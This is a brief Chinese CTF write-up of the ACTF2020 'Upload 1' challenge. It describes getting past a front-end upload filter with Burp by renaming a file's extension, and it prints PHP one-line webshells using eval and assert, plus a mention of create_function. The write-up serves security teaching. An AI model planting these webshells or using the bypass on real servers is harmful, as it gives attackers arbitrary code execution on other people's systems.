ACTF2020 新生赛 Upload 1

打开网页发现是个文件上传的页面,试着上传php文件,发现不行后,
尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。
具体步骤如下:
1、书写一句话木马,例如:

eval和assert:
php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。

 @eval($_GET["cmd"]); ?>  
<?php @assert($_POST['a']) ?>

create_function和preg_replace函数:
create_function,它的作用是创建一个匿名函数,在内部也相当于执行了一次eval。php5,7都可用

 

你可能感兴趣的:(CTF,网络安全)